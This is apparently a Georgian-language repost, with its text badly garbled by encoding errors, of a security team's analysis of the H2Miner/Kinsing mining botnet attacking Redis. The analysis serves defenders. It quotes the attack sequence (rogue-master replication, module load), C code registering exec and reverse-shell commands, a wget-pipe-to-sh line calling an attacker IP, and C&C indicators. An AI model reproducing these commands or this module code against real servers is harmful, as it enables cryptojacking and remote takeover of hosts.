แแ แแ แแฆแแก แฌแแ, แฉแแแ แแ แแแฅแขแแก แแ แ-แแ แ แกแแ แแแ แก แแแแกแฎแ แแกแแแแกแ แญแแ. แแแแฎแแแแ "แ แ แแงแ แแก?" แแแกแฃแฎแแก แซแแแแแจแ. แแแแแแ แจแแกแแแแจแแแแ แกแขแแขแแ Alibaba Cloud Security แแฃแแแแก แแแแ . แแแแแแแแ แแก แกแขแแขแแ Habrรฉ-แแ แแแ แแแแแแ, แแแแแแฌแงแแแขแ แแแกแ แแแ แแแแ แกแแแชแแแแฃแ แแ แแฅแแแแแแแก <3
Entry
แชแแขแ แฎแแแก แฌแแ, Alibaba Cloud-แแก แฃแกแแคแ แแฎแแแแแก แฏแแฃแคแแ แแฆแแแแฉแแแ H2Miner-แแก แฃแแชแแ แ แแคแแแฅแแแ. แแ แขแแแแก แแแแแ แญแแ แแงแแแแแก แแแขแแ แแแแชแแแก แแแแแแแแแแก แแ แกแฃแกแข แแแ แแแก Redis-แแกแแแแก, แ แแแแ แช แแแ แแแญแแแแ แแฅแแแแก แกแแกแขแแแแจแ, แ แแก แจแแแแแแแช แแแ แกแแแฅแ แแแแแแแก แกแแแฃแแแ แแแแแ แแแแฃแแก แแแแแกแแแ master-slave แกแแแฅแ แแแแแแชแแแก แแแแ แแ แแแแแก แฉแแแแขแแแ แแแแก แแ แแแแแ แแแแฃแแก แแแแแแกแฎแแฃแ แแแแฅแแแแจแ แแ แแฎแแ แชแแแแแแก แแแแแ แแแแฃแแก. แแแกแขแ แฃแฅแชแแแแ.
แฌแแ แกแฃแแจแ, แแฅแแแแก แกแแกแขแแแแแแ แแแแแแกแฎแแแแ แซแแ แแแแแแ แแแแฎแแ แชแแแแแ แแแแแแแก แแแแแงแแแแแแ, แ แแแแแแช แแแแชแแแก แแแแแแแแ แแแแชแแแแแก แแ SSH แแแแแแจแแแก, แ แแแแแแแช แแแแฌแแ แ แแฅแแแแก แแแแแแฃแขแแ แจแ แแแก แจแแแแแ, แ แแช แแแแแแแกแฎแแแแ แจแแแแแ Redis-แจแ. แกแแแแแแแแ แแ, แแ แแแแแแแก แฎแจแแ แแ แแแแแงแแแแแ แจแแฃแซแแแแแแแ แแแแแ แแแแก แแแแขแ แแแแก แแ แแแแแแแแแก แแแแ แแ แกแแกแขแแแแก แกแฎแแแแแกแฎแแ แแแ แกแแแแแก แแแแ. แแฃแแชแ, แแแแแ แแแแฃแแแก แฉแแขแแแ แแแแก แแ แแแแแแก แจแแฃแซแแแ แฃแจแฃแแแแ แจแแแกแ แฃแแแก แแแแแแแกแฎแแแแแก แแ แซแแแแแแแ แแ แแแแแแแแก แฌแแแแแ แญแฃแ แแแ, แ แแช แกแแจแแจแแ แแฅแแแแ แกแแกแขแแแแกแแแแก.
แแแขแแ แแแขแจแ แแแแแแแกแแแฃแแ Redis แกแแ แแแ แแแแก แแแแ แ แแแแแแแแแก แแแแ (แแแแฎแแแแแแ 1 แแแแแแแ), Alibaba Cloud-แแก แฃแกแแคแ แแฎแแแแแก แแฃแแแ, แ แแแแ แช แแแแแแ แฃแแ แจแแฎแกแแแแแ, แฃแ แฉแแแก แแแแฎแแแ แแแแแแก แแ แแแแแแแ แแ Redis แแแแแแ แแ แ แแแฃแแแ แฃแแแ แจแแแแแฌแแแ แแแแ แแแ แแแแแแก แกแแซแแแแ แ แแ แแ แแก แแฃ แแ แ แแกแแแ แแแแแ แแแแขแแ แแแฃแแ. แกแฌแ แแคแ แจแแ แฉแแแ.
H2Miner
H2Miner แแ แแก แแแแแแแ แแแขแแแขแ Linux-แแ แแแคแฃแซแแแแฃแแ แกแแกแขแแแแแแกแแแแก, แ แแแแแกแแช แจแแฃแซแแแ แจแแแญแ แแก แแฅแแแแก แกแแกแขแแแแจแ แกแฎแแแแแกแฎแแ แแแแ, แแแ แจแแ แแก แแแขแแ แแแแชแแแก แแ แแ แกแแแแแ Hadoop yarn, Docker แแ Redis แแแกแขแแแชแแฃแ แ แแ แซแแแแแแก แจแแกแ แฃแแแแแก (RCE) แแแฃแชแแแแแแแแจแ. แแแขแแแขแ แแฃแจแแแแก แแแแแ แกแแ แแแขแแแแกแ แแ แแแแแ แแ แแแ แแแแแแก แฉแแแแขแแแ แแแแ แแฅแแแแ แแแแแชแแแแแแก แแแกแแแแแแแแแ, แจแแขแแแแก แฐแแ แแแแแขแแแฃแ แแ แแแคแแ แแแแแแก แแ แแ แซแแแแแแกแ แแ แแแแขแ แแแแก (C&C) แแแแฃแแแแแชแแแแแก แจแแกแแแแ แฉแฃแแแแแแ.
Redis RCE
แชแแแแ แแ แแแแแแ แแแแแ แขแแแแ แแแแแ แแแแแแแ แ ZeroNights 2018-แแ. 4.0 แแแ แกแแแก แจแแแแแ, Redis แแฎแแ แก แฃแญแแ แก แแแแแแแขแแก แฉแแขแแแ แแแแก แคแฃแแฅแชแแแก, แ แแแแแแช แแแแฎแแแ แแแแแแก แแซแแแแก แจแแกแแซแแแแแแแแก แฉแแขแแแ แแแ แคแแแแแแ C-แแ แจแแแแแแแแ Redis-แจแ, แ แแแ แจแแแกแ แฃแแแ แแแแแ แแขแฃแแ Redis แแ แซแแแแแแแ. แแก แคแฃแแฅแชแแ, แแฃแแชแ แกแแกแแ แแแแแแ, แจแแแชแแแก แแแฃแชแแแแแแแก, แ แแแแแจแแช, master-slave แ แแแแแจแ, แคแแแแแแแก แกแแแฅแ แแแแแแชแแ แจแแกแแซแแแแแแแ slave-แแแ แกแ แฃแแ แกแแแฅแ แแแแแแชแแแก แ แแแแแแก แแแจแแแแแแ. แแก แจแแแซแแแแ แแแแแแงแแแแก แแแแแแแกแฎแแแแแ แแแแแ แคแแแแแแแก แแแแแกแแขแแแแ. แแแแแชแแแแก แแแกแ แฃแแแแแก แจแแแแแ, แแแแแแแกแฎแแแแแแ แแขแแแ แแแแแ แแแแฃแแก แแแแแแกแฎแแฃแ Redis แแแกแขแแแชแแแแ แแ แแกแ แฃแแแแแ แแแแแกแแแแ แแ แซแแแแแแก.
แแแแแ แญแแแแแก แแแแแแแ
แชแแขแ แฎแแแก แฌแแ, Alibaba Cloud-แแก แฃแกแแคแ แแฎแแแแแก แฏแแฃแคแแ แแฆแแแแฉแแแ, แ แแ H2Miner แแแแแ แแแแแแ แแแแก แฏแแฃแคแแก แแแแ แแแฃแแแแแแแแ แแแแแแ แแ แแแแแแ แแ. แแแแแแแแก แแแฎแแแแแ, แแแแแแกแฎแแแก แฌแแ แแแจแแแแก แแแแแแ แแ แแชแแกแ แจแแแแแแแ:
H2Miner แแงแแแแแก RCE Redis-แก แกแ แฃแแคแแกแแแแแ แจแแขแแแแกแแแแก. แแแแแแแกแฎแแแแแแ แแแ แแแ แ แแแจแ แแแแก แแกแฎแแแแ แแแฃแชแแแ Redis แกแแ แแแ แแแก แแ แกแแ แแแ แแแก แกแฃแกแขแ แแแ แแแแแแ.
แจแแแแแ แแกแแแ แแงแแแแแแ แแ แซแแแแแแก config set dbfilename red2.so
แคแแแแแก แกแแฎแแแแก แจแแกแแชแแแแแแ. แแแแก แจแแแแแ แแแแแแแกแฎแแแแแแ แแกแ แฃแแแแแ แแ แซแแแแแแก slaveof
แแแแแแ -แกแแแแแก แ แแแแแแแชแแแก แฐแแกแขแแก แแแกแแแแ แแแก แแแกแแงแแแแแแแ.
แ แแแแกแแช แแแแแแกแฎแแฃแแ Redis แแแกแขแแแชแแ แแแงแแ แแแก แแแแจแแ แก master-slave แแแแแ Redis-แแแ, แ แแแแแแช แแแฃแแแแแก แแแแแแแกแฎแแแแก, แแแแแแแกแฎแแแแ แแแแแแแแก แแแคแแชแแ แแแฃแ แแแแฃแแก fullresync แแ แซแแแแแแก แแแแแงแแแแแแ แคแแแแแแแก แกแแแฅแ แแแแแแชแแแกแแแแก. red2.so แคแแแแ แจแแแแแ แฉแแแแแขแแแ แแแแ แแแแแแกแฎแแฃแ แแแแฅแแแแจแ. แจแแแแแ แแแแแแแกแฎแแแแแแ แแงแแแแแแ ./red2.so แฉแแขแแแ แแแแก แแแแฃแแก แแ so แคแแแแแก แฉแแกแแขแแแ แแแ. แแแแฃแแก แจแแฃแซแแแ แจแแแกแ แฃแแแก แแ แซแแแแแแแ แแแแแแแกแฎแแแแแกแแแ แแ แแแแฌแงแแก แกแแแแ แแกแแแ แ แแแแจแแ แ (แฃแแแแ แแแ แ) แแแแแแกแฎแแฃแ แแแแฅแแแแแ แฌแแแแแแก แแแกแแฆแแแแ.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
แแแแแ แแ แซแแแแแแก แจแแกแ แฃแแแแแก แจแแแแแ, แ แแแแ แแชแแ / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1
, แแแแแแแกแฎแแแแ แแฆแแแแแแก แกแแ แแแแ แแ แคแแแแแก แกแแฎแแแก แแ แแแแแแขแแแ แแแแก แกแแกแขแแแแก แแแแฃแแก แแแแแแก แแแกแแกแฃแคแแแแแแแแ. แแฃแแชแ, red2.so แคแแแแ แแแแแ แแแ แฉแแแ แแแแแแกแฎแแฃแ แแแแฅแแแแแ. แแแแฎแแแ แแแแแแก แฃแ แฉแแแแ แงแฃแ แแแฆแแแ แแแแฅแชแแแ แแกแแแ แกแแแญแแ แคแแแแแก แแ แกแแแแแแก แแแแ Redis แแแกแขแแแชแแแก แกแแฅแแฆแแแแแจแ.
แแแแแแ แแ แแแแแ แแ แแชแแกแแก แแแแแแแก แแแ แแ แ แแกแฃแ แกแแแแก แแแแแ แแแก แแแแแแ, แแแแแแแกแฎแแแแ แแแฐแงแแ แแแแแ แกแแ แแแขแก แแแแแ แแ แแแแแ แคแแแแแแแก แฉแแแแขแแแ แแแแ แแ แจแแกแ แฃแแแแแ.
แกแแแแ แแกแแแ แ แกแแแแแแแ แ แจแแแแแแแแก แแแฎแแแแแ, แแแแแ แแ แแแ แแแ แซแแ แแแแแแ แแกแ แฃแแแแก แจแแแแแ แคแฃแแฅแชแแแแก:
- แคแแแแแแแก แแขแแแ แแแ แแ แแแแ แจแแกแ แฃแแแแ
- แกแแแแ
- C&C แแแแฃแแแแแชแแแก แจแแแแ แฉแฃแแแแ แแ แแแแแแแกแฎแแแแแก แแ แซแแแแแแแแก แจแแกแ แฃแแแแ
แแแแแแงแแแแ Mascan แแแ แ แกแแแแแ แแแแกแแแแก แแฅแแแแ แแแแแแแแก แแแกแแคแแ แแแแแแแ. แแแ แแ แแแแกแ, C&C แกแแ แแแ แแก IP แแแกแแแแ แแ แแงแแ แแ แแแแแ แแแฃแแแ แแ แแแ แแแแจแ แแ แแแแแแกแฎแแแก แแฅแแแ แฐแแกแขแ แแแฃแแแแจแแ แแแแ C&C แกแแแแแฃแแแแแชแแ แกแแ แแแ แก HTTP แแแแฎแแแแแก แแแแแงแแแแแแ, แกแแแแช แแแแแ (แแแขแแฎแแแ แกแแ แแแ แแก) แแแคแแ แแแชแแ แแแแแขแแคแแชแแ แแแฃแแแ HTTP แกแแแแฃแ แจแ.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
แแแแแแกแฎแแแก แกแฎแแ แแแแแแแแ
แญแแแก แแแแ แแแแแงแแแแแฃแแ แแแกแแแแ แแแแ แแ แแแฃแแแแ
/แแแแแกแแแ
โข 142.44.191.122/t.sh
โข 185.92.74.42/h.sh
โข 142.44.191.122/spr.sh
โข 142.44.191.122/spre.sh
โข 195.3.146.118/unk.sh
แก แแ แ
โข 45.10.88.102
โข 91.215.169.111
โข 139.99.50.255
โข 46.243.253.167
โข 195.123.220.193
แ แฉแแแแแ
แแแ แแแแ, Redis แแ แฃแแแ แแงแแก แฎแแแแแกแแฌแแแแแ แแแขแแ แแแขแแแแ แแ แแแชแฃแแ แฃแแแ แแงแแก แซแแแแ แ แแแ แแแแ. แแกแแแ แแแแจแแแแแแแแแแ, แ แแ แแแแแแขแแแแ แจแแแแแฌแแแ, แ แแ แแ แแ แแก red2.so แคแแแแ Redis แแแ แแฅแขแแ แแแจแ แแ แ แแ แแ แแ แแก โkinsingโ แคแแแแแก/แแ แแชแแกแแก แกแแฎแแแจแ แฐแแกแขแแ.
แฌแงแแ แ: www.habr.com